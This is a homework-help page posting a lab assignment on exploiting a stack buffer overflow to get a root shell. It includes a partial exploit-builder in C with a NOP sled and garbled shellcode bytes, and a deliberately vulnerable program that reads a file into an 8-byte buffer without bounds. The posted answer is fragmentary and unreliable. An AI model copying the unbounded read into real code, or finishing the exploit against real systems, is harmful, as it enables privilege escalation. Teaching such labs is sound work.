We provide you with some partially completed exploit creation code called buildE

Question

We provide you with some partially completed exploit creation code called buildExploit.c. The goal of this code is to construct contents for “overflow” and “exploit”. In this code, the shell code is given to you (as above). You need to develop the rest; e.g., the correct exploit and overflow. After you finish the above program, compile and run it. This will generate the overflow data and the executable exploit shell code in the files “overflow” and “exploit”, respectively. Then, run the vulnerable program stack. If your exploit is implemented correctly, you should be able to obtain a “root” shell:

//
// buildExploit.c

//
// - a program to create files to exploit overflow vulnerability

//

#include

#include

#include

// NOTE - only the sleigh code is provided -- need to put exploit code here

char exploit_code[]=

"�" /* nop */

"�"/* nop */
  
"�" /* nop */
  
"�"/* nop */
  
"�" /* nop */
  
"�" /* nop */
  
"�" /* nop */
  
"�" /* nop */
  
"�" /* nop */
  
"�"/* nop */
  
"�" /* nop */
  
"�" /* nop */
  
"�"/* nop */
  
"�" /* nop */
  
"�" /* nop */
  
"�"/* nop */

;

FILE *fp;

int main(int argc, char **argv)

{

char buffer[512];

//
// NOTE: the overflow may need to be more or less than 16 bytes...

//
  
char overflow[16]="ﾭ�ﾭ�"
  
"ﾭ�ﾭ�";

int i, n;

char nop = 0x90;

/* Initialize buffer with 0x90 (NOP instruction) */

memset(buffer, 0x90, 512);

/* Copy exploit code to the buffer to be output to exploit */

n = sizeof(exploit_code);

for (i=0; i
buffer[i] = exploit_code[i];

/* Save the object code to the file "exploit" */

fp = fopen("./exploit", "wb");

fwrite(buffer, 512, 1, fp);

fclose(fp);

/* Save the overflow data to the file "overflow" */

fp = fopen("./overflow", "wb");

fwrite(overflow, sizeof(overflow), 1, fp);

fclose(fp);

return 0;

}

// vstack.c - vulnerable stack
//
// - this program has a buffer overflow vulnerability,
// your task is to exploit this vulnerability
//
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

FILE *fp;
char *bp;
char buf[512];

int load_code(char *filename)
{
printf("%016llX ", (long long unsigned) buf); // output location
fp = fopen(filename, "rb"); // rb = read binary
fread(buf, sizeof(char), 512, fp);
fclose(fp);
return 0;
}

int bof(char *filename)
{
char buffer[8];
int i;

bp = buffer;
fp = fopen(filename, "rb");

/* The following statement has a potential buffer overflow problem */
while (!feof(fp))
fread(bp++, sizeof(char), 1, fp);
fclose(fp);
return 0;
}

int main(int argc, char **argv)
{
switch(argc)
{
case 3:
load_code(argv[2]);
printf("Loaded code ");
bof(argv[1]);
printf("Loaded overflow, so what are we doing back here? ");
break;
default:
printf("Usage: vstack <overflow> <exploit> ");
break;
}
return 0;
}

Explanation / Answer

b)

b) The second code is the exploit.

c) use this commands from comand line

Related Questions

Navigate

• Browse (All)
• Browse W
• Subjects

Integrity-first tutoring: explanations and feedback only — we do not complete graded work. Learn more.